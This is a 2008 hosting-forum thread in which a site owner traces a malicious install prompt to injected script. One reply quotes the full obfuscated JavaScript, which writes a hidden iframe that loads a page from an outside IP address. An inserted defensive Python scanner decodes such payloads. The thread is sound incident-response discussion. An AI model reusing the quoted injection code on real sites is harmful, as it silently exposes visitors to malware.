  #1 (permalink)  
Old 06-19-2008, 12:06 PM
Member
 
Join Date: Jan 2008
Location: Grimsby,UK
Posts: 61
Default Question........

Morning all
I have this problem maybe someone can help me with.....???
I got an email from a friend telling me that when she went to my site (swtharmonygraphics.com) using IE that nasty yellow information bar jumped up and said...
'This site is trying to install 'virusremover.dll from 'OOO.AJSBIRI. If you trust this website and the add-on and want to install it click here'
So I put in a support ticket to tech support asking them if they could run a scan on my VPS. They did and it came back clear.
So I deleted my index page (the one appearing to be infected) and reuploaded it. The information bar did not reappear after that when I tried the URL again.
But I did notice that all the sites on my VPS that I maintain for clients had the yellow bar also! Ones I did not maintain did not.
I tried my URL several times yesterday and nothing. I even tried AFTER rebooting my pc and still nothing.
BUT this morning when I booted up the darn thing had reappeared!
Can anyone point me in the right direction about what to do about this??
There is obviously something, somewhere, on my site and I would be ever so grateful if anyone has any suggestions on how to get rid of it.
Thanks bunches

MaryT
Reply With Quote
  #2 (permalink)  
Old 06-20-2008, 02:51 PM
Senior Member
 
Join Date: Jan 2007
Posts: 948
Default

Hi, I didn't notice the trojan attempting to download on the index page, but rather on the purchaseware page.
I had a quick look at your source code for that page and the code below looked like the culprit:

Quote:
<script>
<!--
var d=document,kol=561;
function O10H485BA7DC17234(H485BA7DC17633){ function H485BA7DC17A2A() {var H485BA7DC17E26=16;return H485BA7DC17E26;} return( parseInt(H485BA7DC17633,H485BA7DC17A2A()));}functi on H485BA7DC18225(H485BA7DC1861F){ function H485BA7DC19419() {return 2;} var H485BA7DC18A35='';for(H485BA7DC18E37=0; H485BA7DC18E37<H485BA7DC1861F.length; H485BA7DC18E37+=H485BA7DC19419()){ H485BA7DC18A35 += ( String.fromCharCode (O10H485BA7DC17234(H485BA7DC1861F.substr(H485BA7DC 18E37, H485BA7DC19419()))));}return H485BA7DC18A35;} document.write(H485BA7DC18225('3C7363726970743E696 628216D796961297B642E777269746528273C494652414D452 06E616D653D4F31207372633D5C27687474703A2F2F37372E3 232312E3133332E3137312F2E69662F676F2E68746D6C3F272 B4D6174682E726F756E64284D6174682E72616E646F6D28292 A313333373232292B2730313834325C272077696474683D373 832206865696768743D313731207374796C653D5C276469737 06C61793A206E6F6E655C273E3C2F494652414D45203E27293 B7D766172206D7969613D747275653B3C2F7363726970743E' ));
//-->
</script>
You can google help for this problem (google: var d=document,kol=561) but read the link below; it may help to find out if your vps is infected or your pc.
http://wordpress.org/support/topic/182061
__________________
West Dorset Community

Last edited by jon123; 06-20-2008 at 02:54 PM.
Reply With Quote
  #3 (permalink)  
Old 06-20-2008, 06:16 PM
Member
 
Join Date: Jan 2008
Location: Grimsby,UK
Posts: 61
Default

Thanks Jon!!
Your reply was a great help
It appears this is what I have on my pc but I'm not sure if it has affected the VPS or not
I mailed tech support again today but as yet have not heard back from them
Thanks again for your reply
I owe you one as I was about tearing my hair out lol

MaryT
Reply With Quote
  #4 (permalink)  
Old 06-20-2008, 07:15 PM
Sales Manager
 
Join Date: May 2006
Posts: 743
Default

Could you please provide me with the ticket number ?
__________________
Web Hosting | VPS Hosting | Dedicated Server
Toll Free : 0808 262 0855
Reply With Quote
  #5 (permalink)  
Old 06-20-2008, 07:21 PM
Member
 
Join Date: Jan 2008
Location: Grimsby,UK
Posts: 61
Default

Sure James.........
#CKO-83957-984
Thanks James

MaryT
Reply With Quote
  #6 (permalink)  
Old 06-20-2008, 08:33 PM
Senior Member
 
Join Date: Jan 2007
Posts: 948
Default

Quote:
Originally Posted by MaryT View Post
Thanks Jon!!
Your reply was a great help
It appears this is what I have on my pc but I'm not sure if it has affected the VPS or not
I mailed tech support again today but as yet have not heard back from them
Thanks again for your reply
I owe you one as I was about tearing my hair out lol

MaryT
You're welcome.
I would assume that if this code is in the source files on your pc then it sounds like your pc is infected rather than the vps. Hopefully James will give you a clean bill of health.
I think if I was experiencing this problem, I personally would change my passwords on any logins I have on my site though, just to make sure.

Good luck
__________________
West Dorset Community
Reply With Quote
  #7 (permalink)  
Old 06-20-2008, 09:51 PM
Member
 
Join Date: Jan 2008
Location: Grimsby,UK
Posts: 61
Default

Thanks Jon
I found lots of pages with that code in them. I also found a file in the cgi bin in my site files that had nothing but that code in it. It was an index.shtml file. The code was mostly in any file named 'index'.
I ran a scan using Spy Doctor.........but it won't get rid of anything it finds unless you purchase the program LOL.
I hope my VPS is clean.........tech support did a scan yesterday at my request and found nothing they said.
Fingers crossed anyway.
Thanks so much for your help with this....I really appreciate it.

MaryT
Reply With Quote
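Added example, not part of any post in this thread and not the host's tooling: a Python sketch that checks a local copy of the site files for the pattern quoted in post #2 and found across the index files in post #7, and statically decodes the hex string to reveal the hidden iframe without running the script. The sample page, the `unhex` name, the 192.0.2.10 address and the 80-character threshold are constructed for the example.

```python
import re
from pathlib import Path

WEB_SUFFIXES = {".html", ".htm", ".shtml", ".php", ".js", ".asp"}
# Marker line quoted in post #2 (whitespace-tolerant).
MARKER = re.compile(r"var\s+d\s*=\s*document\s*,\s*kol\s*=\s*\d+")
# A quoted run of hex digits long enough to hide markup (assumed threshold: 80).
HEX_ARG = re.compile(r"'([0-9A-Fa-f\s]{80,})'")
IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc\s*=\s*\\?['\"]?([^'\"\\\s>]+)", re.I)

# Constructed sample, not taken from the thread: a hidden iframe pointing at a
# documentation-range address, hex-encoded the way the quoted script does it.
# "unhex" is a hypothetical stand-in for the randomly named decoder function.
_HIDDEN = "<iframe src='http://192.0.2.10/x.html' style='display:none'></iframe>"
SAMPLE_PAGE = ("<html><body>Welcome<script>var d=document,kol=561;\n"
               f"document.write(unhex('{_HIDDEN.encode().hex().upper()}'));"
               "</script></body></html>")


def decode_hex_payload(blob: str) -> str:
    """Decode hex pairs to text without executing anything; '' if malformed."""
    cleaned = re.sub(r"\s+", "", blob)
    if len(cleaned) % 2:
        return ""
    return bytes.fromhex(cleaned).decode("latin-1")


def inspect_text(text: str) -> dict:
    """Report the marker, any decoded hex payloads, and iframe URLs inside them."""
    decoded = [d for d in map(decode_hex_payload, HEX_ARG.findall(text)) if d]
    urls = [u for d in decoded for u in IFRAME_SRC.findall(d)]
    return {"marker": bool(MARKER.search(text)), "decoded": decoded, "iframes": urls}


def scan_tree(root: str) -> dict:
    """Walk a local copy of the site and return findings per suspicious file."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_SUFFIXES:
            result = inspect_text(path.read_text(errors="replace"))
            if result["marker"] or result["iframes"]:
                findings[str(path)] = result
    return findings


if __name__ == "__main__":
    print(inspect_text(SAMPLE_PAGE))
```

Run `scan_tree` against both the downloaded server copy and the local working folder; a hit in the local copy only points at the PC as the source, which is the distinction the thread is trying to draw.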
  #8 (permalink)  
Old 06-21-2008, 12:00 AM
Member
 
Join Date: May 2008
Location: Newcastle under Lyme
Posts: 54
Default

Quote:
Originally Posted by MaryT View Post
Thanks Jon
I found lots of pages with that code in them. I also found a file in the cgi bin in my site files that had nothing but that code in it. It was an index.shtml file. The code was mostly in any file named 'index'.
I ran a scan using Spy Doctor.........but it won't get rid of anything it finds unless you purchase the program LOL.
I hope my VPS is clean.........tech support did a scan yesterday at my request and found nothing they said.
Fingers crossed anyway.
Thanks so much for your help with this....I really appreciate it.

MaryT
I wonder if you use Front Page Extensions...
__________________
black-dog
4theweb.co.uk Web stuff
slipperyhill.co.uk Band
Reply With Quote
  #9 (permalink)  
Old 06-21-2008, 04:37 AM
Member
 
Join Date: Jan 2008
Location: Grimsby,UK
Posts: 61
Default

I don't 'use' FP extensions blackdog but they are there on my site files......
Well they were but I removed them lol
I don't use FP for building and uploading my websites.......I use Dreamweaver.
Thanks for your reply

MaryT
Reply With Quote
  #10 (permalink)  
Old 06-21-2008, 08:42 AM
Member
 
Join Date: May 2008
Location: Newcastle under Lyme
Posts: 54
Default

Good.

I had a client with a similar problem but never did get to the bottom of how the code ended up on the pages. It was a similar story, javascript in the index pages.

I'd just like to know how it gets there, for future reference.
__________________
black-dog
4theweb.co.uk Web stuff
slipperyhill.co.uk Band
Reply With Quote
  #11 (permalink)  
Old 06-21-2008, 07:39 PM
Member
 
Join Date: Jan 2008
Location: Grimsby,UK
Posts: 61
Default

I think a lot of people would like to know how it gets there black-dog....these things are annoying.
But thankfully my VPS is clean lol

MaryT
Reply With Quote
  #12 (permalink)  
Old 06-23-2008, 09:32 AM
Member
 
Join Date: Jan 2008
Location: Grimsby,UK
Posts: 61
Default

Update on this problem......
It appears to have gone!!
Thanks to Jon I found the code on all the pages it had been placed, scanned my pc and found the culprit hiding there too.
One of my clients also had the pest on her pc!
Thanks to the info from black-dog I removed all the FP extensions files.....they weren't being used as I use DW
While the FP extensions were there (_vti folders) the code kept reappearing but once I removed them and deleted the code again, reuploaded the index page, it didn't come back.
Maybe there is a connection there somewhere??
Anyways just a quick thank you to Jon, James and black-dog for all your help. Oh and not forgetting tech support too lol
This forum and web hosting company just has to be the best!

MaryT
Reply With Quote
  #13 (permalink)  
Old 06-23-2008, 10:07 AM
Member
 
Join Date: May 2008
Location: Newcastle under Lyme
Posts: 54
Default

Quote:
Originally Posted by MaryT View Post
Thanks to the info from black-dog I removed all the FP extensions files.....they weren't being used as I use DW
While the FP extensions were there (_vti folders) the code kept reappearing but once I removed them and deleted the code again, reuploaded the index page, it didn't come back.
Maybe there is a connection there somewhere??
MaryT
Almost certainly.

I had a client with a similar problem.

Check with tech support but I don't think removing the folders removes Front Page Extensions from your VPS.
__________________
black-dog
4theweb.co.uk Web stuff
slipperyhill.co.uk Band
Reply With Quote
  #14 (permalink)  
Old 06-23-2008, 05:02 PM
Administrator
 
Join Date: Mar 2006
Posts: 1,752
Default

We will need to remove frontpage rpm from your vps to remove frontpage completely.

Please let me know if you want me to proceed with removal of frontpage rpm.
__________________
Web Hosting UK - ASP MSSQL Hosting - cPanel Linux Hosting
AIM : webredback || msn : andrew @ webhosting.uk.com
Toll Free : 0808 262 0855
Reply With Quote
All times are GMT.
Copyright 2002-2007 WebHosting.uk.com. All rights reserved.
Web Hosting UK Forum